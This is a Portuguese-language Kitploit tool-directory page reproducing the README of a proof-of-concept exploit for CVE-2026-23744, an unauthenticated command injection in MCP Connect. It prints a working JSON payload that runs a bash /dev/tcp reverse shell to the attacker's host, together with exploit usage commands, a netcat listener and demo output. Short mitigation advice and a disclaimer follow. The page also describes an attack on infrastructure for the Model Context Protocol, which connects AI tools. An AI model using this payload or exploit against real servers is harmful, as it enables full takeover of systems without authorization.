Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-23744 — Prova de conceito de exploit para CVE-2026-23744, uma injeção de comando não autenticada no MCP Connect que leva à execução remota de código e shell reverso. | Kitploit
Ferramentas/GitHubGitHub/cylock11/cve-2026-23744
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed Teaming
GitHubcylock11/cve-2026-23744

CVE-2026-23744

Prova de conceito de exploit para CVE-2026-23744, uma injeção de comando não autenticada no MCP Connect que leva à execução remota de código e shell reverso.

Ver Repositório
há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-23744 — MCP Connect RCE via Unauthenticated Command Injection

Python Category Type License

⚠️ Aviso: Este repositório é apenas para fins educacionais e de pesquisa em segurança. O uso deste exploit contra sistemas sem autorização explícita é ilegal. O autor não se responsabiliza pelo uso indevido deste código.


📌 Descrição da Vulnerabilidade

A vulnerabilidade reside no endpoint /api/mcp/connect, que permite a um atacante não autenticado registrar um servidor MCP (Model Context Protocol) arbitrário com uma configuração maliciosa. Como não há validação nem sanitização do campo command e seus args, é possível injetar comandos do sistema operacional que são executados diretamente no servidor com os privilégios do processo web.

Isso resulta em uma execução remota de código (RCE) que pode ser aproveitada para obter uma reverse shell sobre o sistema comprometido.


🧠 Detalhes Técnicos

CampoDetalhe
TipoRemote Code Execution (RCE)
VetorRede (HTTP POST sem autenticação)
Endpoint/api/mcp/connect
Severidade🔴 Crítica
AutenticaçãoNão requerida
ImpactoControle total do servidor

Payload malicioso

root@kitploit:~
{
  "serverId": "shell1",
  "serverConfig": {
    "command": "bash",
    "args": ["-c", "bash -i >& /dev/tcp/<LHOST>/443 0>&1"],
    "env": {}
  }
}

O servidor processa essa configuração e invoca o comando bash com os argumentos fornecidos, estabelecendo uma conexão TCP reversa em direção ao atacante.


🛠️ Requisitos

  • Python 3.x
  • As seguintes bibliotecas:
root@kitploit:~
pip install requests termcolor

🚀 Uso

root@kitploit:~
python3 exploit.py -l <SEU_IP> -u <URL_ALVO>

Parâmetros

ParâmetroDescriçãoExemplo
-lSeu IP (onde você receberá a shell)192.168.1.50
-uURL base do alvohttps://victim.com

Exemplo completo

Terminal 1 — Listener:

root@kitploit:~
nc -nlvp 443

Terminal 2 — Exploit:

root@kitploit:~
python3 exploit.py -l 192.168.1.50 -u https://victim.com

🎬 Demo

root@kitploit:~
[-] Please, execute the following command in another terminal:

[+] nc -nlvp 443

[-] Press 'Enter' when the command has been executed...

[+] Sending attack request...

Uma vez enviada a solicitação, o listener na porta 443 receberá a conexão reversa com uma shell interativa do servidor comprometido.


🛡️ Mitigação

  • Validar e sanitizar todos os campos do body em /api/mcp/connect antes de processá-los.
  • Autenticar o endpoint e restringir seu acesso apenas a usuários com privilégios.
  • Nunca executar comandos do sistema diretamente a partir de input do usuário.
  • Implementar uma lista branca de comandos permitidos.
  • Aplicar o princípio de menor privilégio ao processo do servidor web.

📁 Estrutura do Repositório

root@kitploit:~
.
├── exploit.py       # Script principal do exploit
└── README.md        # Este arquivo

👤 Autor

Desenvolvido com fins de pesquisa em segurança ofensiva por Jorge Arana Fedriani.

Baixar ferramenta